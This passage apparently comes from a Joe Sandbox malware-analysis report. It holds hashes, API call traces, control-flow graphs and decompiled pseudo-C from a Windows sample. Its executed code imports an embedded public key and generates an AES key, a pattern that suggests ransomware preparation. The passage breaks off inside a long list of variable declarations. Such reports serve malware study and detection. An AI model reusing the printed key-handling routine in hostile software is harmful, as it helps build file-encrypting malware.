                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocInfoNativeSystemVirtual
                  • String ID:
                  • API String ID: 2032221330-0
                  • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction ID: 0d931faa63895d7dd2ca997f914aedf8a1153a0a819d97dfaf6c798800f0ad34
                  • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                  • Instruction Fuzzy Hash: ACE19D71A0430A8FDB24CF19C94473AB3E1BF94318F18456EEA959B342E778EC45CB99
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 295 5b1900-5b1978 call 5b18f0 call 5b1000 call 5b1470 ExitProcess
                  APIs
                  • ExitProcess.KERNELBASE(00000000), ref: 005B196E
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: ExitProcess
                  • String ID:
                  • API String ID: 621844428-0
                  • Opcode ID: a5aec3077a1aef0a8e1e163df17a60c2dd07410263231ed868c6747be48560c5
                  • Instruction ID: 48dbe75896303477c34e6478e921c6281f02bc0c4b3ee1e99bfad294c86a23a5
                  • Opcode Fuzzy Hash: a5aec3077a1aef0a8e1e163df17a60c2dd07410263231ed868c6747be48560c5
                  • Instruction Fuzzy Hash: 0DF0AF31D0010D9BEB10EFB4C8197DEFBB9BB44310F40809AAA0467241FA312A0A8BD5
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 302 5b2ad0-5b2ada 303 5b2afd 302->303 304 5b2adc-5b2ae7 IsWow64Process 302->304 305 5b2aff-5b2b01 303->305 306 5b2ae9-5b2aef 304->306 307 5b2af1 304->307 308 5b2af8-5b2afb 306->308 307->308 308->305
                  APIs
                  • IsWow64Process.KERNELBASE(000000FF,?), ref: 005B2AE2
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID: ProcessWow64
                  • String ID:
                  • API String ID: 2092917072-0
                  • Opcode ID: d21ada0f03506ed7b8d9338585bf88dcd0351a5368995a6b8cb6ecbbda461e73
                  • Instruction ID: 515555d13a04592d8d1cca4e08c792f745957b7c1dd1960d376bab71ecff6e00
                  • Opcode Fuzzy Hash: d21ada0f03506ed7b8d9338585bf88dcd0351a5368995a6b8cb6ecbbda461e73
                  • Instruction Fuzzy Hash: A6E01A30909648EBCB24DE9888447EDBBB8BB00311F100265E811D2280D7B5AE44E761
                  Uniqueness

                  Uniqueness Score: 0.16%

                  Non-executed Functions

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset
                  • String ID: PO
                  • API String ID: 2102423945-3102315977
                  • Opcode ID: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction ID: ff45062b41a3753ffbf06791dd6c043620541a1b199a0526feb82740c1a555a9
                  • Opcode Fuzzy Hash: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction Fuzzy Hash: 1F023A7090066EEFCB16CF68C9946FBBB71FF85300F14016AC65587742DB3AA961CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`O
                  • API String ID: 0-671071595
                  • Opcode ID: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction ID: b5033d37423fdc029bebee0373c8021ff9f615142b27f38c3b4236c5330b9541
                  • Opcode Fuzzy Hash: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction Fuzzy Hash: F8022230901F148FC775CA29C680667B7F1BF557217604A2EC6E786E91D63AF846CF18
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: y`O
                  • API String ID: 0-671071595
                  • Opcode ID: b96cb0e65caae956d89309612aba2b1de07e8c44b9477945874e0032d935268f
                  • Instruction ID: 0687d7f38934386887cda74d468b2bbcfbca42572012cae3167bff190d6d1ba6
                  • Opcode Fuzzy Hash: b96cb0e65caae956d89309612aba2b1de07e8c44b9477945874e0032d935268f
                  • Instruction Fuzzy Hash: A8A11330901F588FC735CA29C684667B7F1BF55720B504A2ED6E786A91E639F882CF08
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction ID: c46f16a9a50fa8f94cf99254912accfd0168f35c7da64798b3803371bfc4d910
                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction Fuzzy Hash: 1841B371D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB50
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction ID: fa096d4b28396d82548ad37cb5301d341d960d6cb6b0acd2e6e9667d2d6df94e
                  • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                  • Instruction Fuzzy Hash: 3641C471D1051CDBCF48CFADC991AAEBBF2AF88201F548299D516AB345D734AB41DB80
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction ID: 21b4a94f0dd54da6a8920e93c934c4b81594e4ec8c553df878800d79dc9fbab9
                  • Opcode Fuzzy Hash: ded6229e3e23a4507086dc0077879e3907ca58c6aaa16bf319b008a2148b5087
                  • Instruction Fuzzy Hash: 8831A03660434A8FC710DF18D480A3AB7E4FFC9304F4509AEEA9587313D338E9068B95
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 0000000B.00000002.327239879.003F0000.00000040.00000001.sdmp, Offset: 003F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_3f0000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                  • Instruction ID: bc2578dd6b9fb0db097aa24992b2759d24e7c00210767aa3fcb160d93c6bba02
                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                  • Instruction Fuzzy Hash: 131170B23405049FDB54DF59DCC1EB673EAEB98320B298455EE04CB312D675E801C760
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction ID: 88b12265e0f97bd506323b75d0c80854e6ffab2cd54da8538b0ee176a25cf618
                  • Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction Fuzzy Hash: 18019674E10209EFCB44DF98C5909ADFBB5FF48310F208599E809A7741D730AE41DB90
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 0000000B.00000002.327417458.005B1000.00000020.00000001.sdmp, Offset: 005B1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_5b1000_sortedwatched.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction ID: 080466b7ce11205fd0c1150200f8cfcc7cb4620d857c52f85ea8bca6d9544f28
                  • Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction Fuzzy Hash: A3014278E15209EFCB48DF98C5909AEFBB5FF48310F208599E919A7741E730AE41DB90
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction ID: eefdbca49389732c69f4301433ce8881c5a27b7bf8ecc352be77181b50bf1d46
                  • Opcode Fuzzy Hash: 2bcb60f536e0ace9363e1095d119401d239975132a0b2009284b610fb2bfc0a9
                  • Instruction Fuzzy Hash: EF019278E00109EFCB44DF98C6909AEFBB5FF48310F20859AEA09A7705D734AE41DB84
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction ID: 9ee4ff09e5e1e9da669886e532b9ffa98b567d39afc7ca1fc3c36245cc508a04
                  • Opcode Fuzzy Hash: 35fae48b58514328602f79420b2e81abbf1084ebf9a99db8433c1080f312f74a
                  • Instruction Fuzzy Hash: E0019278A00109EFCB44DF98C6909AEF7B5FB48310F20859AEA19A7705D734AE51DB84
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction ID: 47c269dfc356fa0adcfaa00abfba0985b52ac68e63f2ea8be2e03d2a5b21d21f
                  • Opcode Fuzzy Hash: 8ad48bf59bba2d8cda96442d10b01183ac7760b7c19d3faa8316632ce25345ad
                  • Instruction Fuzzy Hash: 59E04F327104988BC631DA95968097AF3A5EB847B0329086BD64693601C2A8BC019644
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Memory Dump Source
                  • Source File: 0000000B.00000002.327369163.004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_4f0000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Execution Graph

                  Execution Coverage:34.7%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:13.3%
                  Total number of Nodes:513
                  Total number of Limit Nodes:8

                  Graph


                  Executed Functions

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 121 401f75-401f96 CryptAcquireContextW 122 401ff3-401ffa 121->122 123 401f98-401fbc CryptDecodeObjectEx 121->123 124 401fe6-401fed CryptReleaseContext 123->124 125 401fbe-401fe4 CryptImportKey LocalFree 123->125 124->122 125->122 125->124
                  C-Code - Quality: 50%
                  			E00401F75(void* __ecx) {
                  				BYTE* _v8;
                  				int _v12;
                  				void* _t6;
                  				void* _t10;
                  				void* _t15;
                  				void* _t18;
                  				int _t19;
                  
                  				_t19 = 0; // executed
                  				_t6 =  *0x41305c(0x416510, 0, 0, 0x18, 0xf0000040, _t15, _t18, __ecx, __ecx); // executed
                  				if(_t6 != 0) {
                  					_t10 =  *0x4136f0(0x10001, 0x13,  &E00412870, 0x6a, 0x8000, 0,  &_v8,  &_v12); // executed
                  					if(_t10 == 0) {
                  						L3:
                  						CryptReleaseContext( *0x416510, 0);
                  					} else {
                  						_t19 = CryptImportKey( *0x416510, _v8, _v12, 0, 0, 0x416514);
                  						LocalFree(_v8);
                  						if(_t19 == 0) {
                  							goto L3;
                  						}
                  					}
                  				}
                  				return _t19;
                  			}











                  APIs
                  • CryptAcquireContextW.ADVAPI32(00416510,00000000,00000000,00000018,F0000040,00000000,00000102,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401F8E
                  • CryptDecodeObjectEx.CRYPT32(00010001,00000013,00412870,0000006A,00008000,00000000,0040F111,?), ref: 00401FB4
                  • CryptImportKey.ADVAPI32(0040F111,?,00000000,00000000,00416514,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401FD1
                  • LocalFree.KERNEL32(0040F111,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FDC
                  • CryptReleaseContext.ADVAPI32(00000000,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FED
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$AcquireDecodeFreeImportLocalObjectRelease
                  • String ID:
                  • API String ID: 900315931-0
                  • Opcode ID: 0083311a598d6ae3bb5be49b27120ac023d57ab4550ec8ba02c96fc250ea7391
                  • Instruction ID: 48002f7dd24f67e1fb8acd982fa0323bbb62263b5e85e9a59621982e2ad0c162
                  • Opcode Fuzzy Hash: 0083311a598d6ae3bb5be49b27120ac023d57ab4550ec8ba02c96fc250ea7391
                  • Instruction Fuzzy Hash: 31018F31740244BBDB315BA2EC09FDB7E7DFB85B01F004179B604E21A0DBB19A10DBA8
                  Uniqueness

                  Uniqueness Score: 1.37%

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00401F75: CryptAcquireContextW.ADVAPI32(00416510,00000000,00000000,00000018,F0000040,00000000,00000102,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401F8E
                    • Part of subcall function 00401F75: CryptDecodeObjectEx.CRYPT32(00010001,00000013,00412870,0000006A,00008000,00000000,0040F111,?), ref: 00401FB4
                    • Part of subcall function 00401F75: CryptImportKey.ADVAPI32(0040F111,?,00000000,00000000,00416514,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401FD1
                    • Part of subcall function 00401F75: LocalFree.KERNEL32(0040F111,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FDC
                    • Part of subcall function 00401F75: CryptReleaseContext.ADVAPI32(00000000,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FED
                  • CryptGenKey.ADVAPI32(0000660E,00000001,00416518,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402026
                  • CryptCreateHash.ADVAPI32(00008004,00000000,00000000,0041651C,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402044
                  • CryptDestroyKey.ADVAPI32(?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402058
                  • CryptDestroyKey.ADVAPI32(?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402064
                  • CryptReleaseContext.ADVAPI32(00000000,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00402072
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: Crypt$Context$DestroyRelease$AcquireCreateDecodeFreeHashImportLocalObject
                  • String ID:
                  • API String ID: 2826826091-0
                  • Opcode ID: c10922a28de3b132bd60650c9f4fd97f46447a34fe901632b894f30011ec60e5
                  • Instruction ID: b801e2a3a967f12315dba04296e97bd271bf4fd4bc32c7350b1888b7b3c01b6c
                  • Opcode Fuzzy Hash: c10922a28de3b132bd60650c9f4fd97f46447a34fe901632b894f30011ec60e5
                  • Instruction Fuzzy Hash: B7F0BD703942057AEA212B31FD0AF963A63BB4470AF158435B611E40F8DFA6D651DE1C
                  Uniqueness

                  Uniqueness Score: 0.19%

                  APIs
                  • CryptDecodeObjectEx.CRYPT32(00010001,00000013,00412870,0000006A,00008000,00000000,0040F111,?,?,?,?,0040200F,?,004060FF,?,0040C7E9), ref: 00401FB4
                  • LocalFree.KERNEL32(0040F111,?,?,?,0040200F,?,004060FF,?,0040C7E9,?,?,?,0040C894,?,?,0040F111), ref: 00401FDC
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CryptDecodeFreeLocalObject
                  • String ID:
                  • API String ID: 4033104587-0
                  • Opcode ID: 0083311a598d6ae3bb5be49b27120ac023d57ab4550ec8ba02c96fc250ea7391
                  • Instruction ID: 48002f7dd24f67e1fb8acd982fa0323bbb62263b5e85e9a59621982e2ad0c162
                  • Opcode Fuzzy Hash: 0083311a598d6ae3bb5be49b27120ac023d57ab4550ec8ba02c96fc250ea7391
                  • Instruction Fuzzy Hash: 31018F31740244BBDB315BA2EC09FDB7E7DFB85B01F004179B604E21A0DBB19A10DBA8
                  Uniqueness

                  Uniqueness Score: 3.32%

                  C-Code - Quality: 83%
                  			E004076C6(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				intOrPtr _v404;
                  				intOrPtr _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				intOrPtr _v436;
                  				intOrPtr _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				intOrPtr _v468;
                  				intOrPtr _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				intOrPtr _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				intOrPtr _v568;
                  				intOrPtr _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				intOrPtr _v604;
                  				intOrPtr _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				intOrPtr _v640;
                  				intOrPtr _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				intOrPtr _v684;
                  				intOrPtr _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				intOrPtr _v704;
                  				intOrPtr _v708;
                  				intOrPtr _v712;
                  				intOrPtr _v716;
                  				intOrPtr _v720;
                  				intOrPtr _v724;
                  				intOrPtr _v728;
                  				intOrPtr _v732;
                  				intOrPtr _v736;
                  				intOrPtr _v740;
                  				intOrPtr _v744;
                  				intOrPtr _v748;
                  				intOrPtr _v752;
                  				intOrPtr _v756;
                  				intOrPtr _v760;
                  				intOrPtr _v764;
                  				intOrPtr _v768;
                  				intOrPtr _v772;
                  				intOrPtr _v776;
                  				intOrPtr _v780;
                  				intOrPtr _v784;
                  				intOrPtr _v788;
                  				intOrPtr _v792;
                  				intOrPtr _v796;
                  				intOrPtr _v800;
                  				intOrPtr _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _v816;
                  				intOrPtr _v820;
                  				intOrPtr _v824;
                  				intOrPtr _v828;
                  				intOrPtr _v832;
                  				intOrPtr _v836;
                  				intOrPtr _v840;
                  				intOrPtr _v844;
                  				intOrPtr _v848;
                  				intOrPtr _v852;
                  				intOrPtr _v856;
                  				intOrPtr _v860;
                  				intOrPtr _v864;
                  				intOrPtr _v868;
                  				intOrPtr _v872;
                  				intOrPtr _v876;
                  				intOrPtr _v880;
                  				intOrPtr _v884;
                  				intOrPtr _v888;
                  				intOrPtr _v892;
                  				intOrPtr _v896;
                  				intOrPtr _v900;
                  				intOrPtr _v904;
                  				intOrPtr _v908;
                  				intOrPtr _v912;
                  				intOrPtr _v916;
                  				intOrPtr _v920;
                  				intOrPtr _v924;
                  				intOrPtr _v928;
                  				intOrPtr _v932;
                  				intOrPtr _v936;
                  				intOrPtr _v940;
                  				intOrPtr _v944;
                  				intOrPtr _v948;
                  				intOrPtr _v952;
                  				intOrPtr _v956;
                  				intOrPtr _v960;
                  				intOrPtr _v964;
                  				intOrPtr _v968;
                  				intOrPtr _v972;
                  				intOrPtr _v976;
                  				intOrPtr _v980;
                  				intOrPtr _v984;
                  				intOrPtr _v988;
                  				intOrPtr _v992;
                  				intOrPtr _v996;
                  				intOrPtr _v1000;
                  				intOrPtr _v1004;
                  				intOrPtr _v1008;
                  				intOrPtr _v1012;
                  				intOrPtr _v1016;
                  				intOrPtr _v1020;
                  				intOrPtr _v1024;
                  				intOrPtr _v1028;
                  				intOrPtr _v1032;
                  				intOrPtr _v1036;
                  				intOrPtr _v1040;
                  				intOrPtr _v1044;
                  				intOrPtr _v1048;
                  				intOrPtr _v1052;
                  				intOrPtr _v1056;
                  				intOrPtr _v1060;
                  				intOrPtr _v1064;
                  				intOrPtr _v1068;
                  				intOrPtr _v1072;
                  				intOrPtr _v1076;
                  				intOrPtr _v1080;
                  				intOrPtr _v1084;
                  				intOrPtr _v1088;
                  				intOrPtr _v1092;
                  				intOrPtr _v1096;
                  				intOrPtr _v1100;
                  				intOrPtr _v1104;
                  				intOrPtr _v1108;
                  				intOrPtr _v1112;
                  				intOrPtr _v1116;
                  				intOrPtr _v1120;
                  				intOrPtr _v1124;
                  				intOrPtr _v1128;
                  				intOrPtr _v1132;
                  				intOrPtr _v1136;
                  				intOrPtr _v1140;
                  				intOrPtr _v1144;
                  				intOrPtr _v1148;
                  				intOrPtr _v1152;
                  				intOrPtr _v1156;
                  				intOrPtr _v1160;
                  				intOrPtr _v1164;
                  				intOrPtr _v1168;
                  				intOrPtr _v1172;
                  				intOrPtr _v1176;
                  				intOrPtr _v1180;
                  				intOrPtr _v1184;
                  				intOrPtr _v1188;
                  				intOrPtr _v1192;
                  				intOrPtr _v1196;
                  				intOrPtr _v1200;
                  				intOrPtr _v1204;
                  				intOrPtr _v1208;
                  				intOrPtr _v1212;
                  				intOrPtr _v1216;
                  				intOrPtr _v1220;
                  				intOrPtr _v1224;
                  				intOrPtr _v1228;
                  				intOrPtr _v1232;
                  				intOrPtr _v1236;
                  				intOrPtr _v1240;
                  				intOrPtr _v1244;
                  				intOrPtr _v1248;
                  				intOrPtr _v1252;
                  				intOrPtr _v1256;
                  				intOrPtr _v1260;
                  				intOrPtr _v1264;
                  				intOrPtr _v1268;
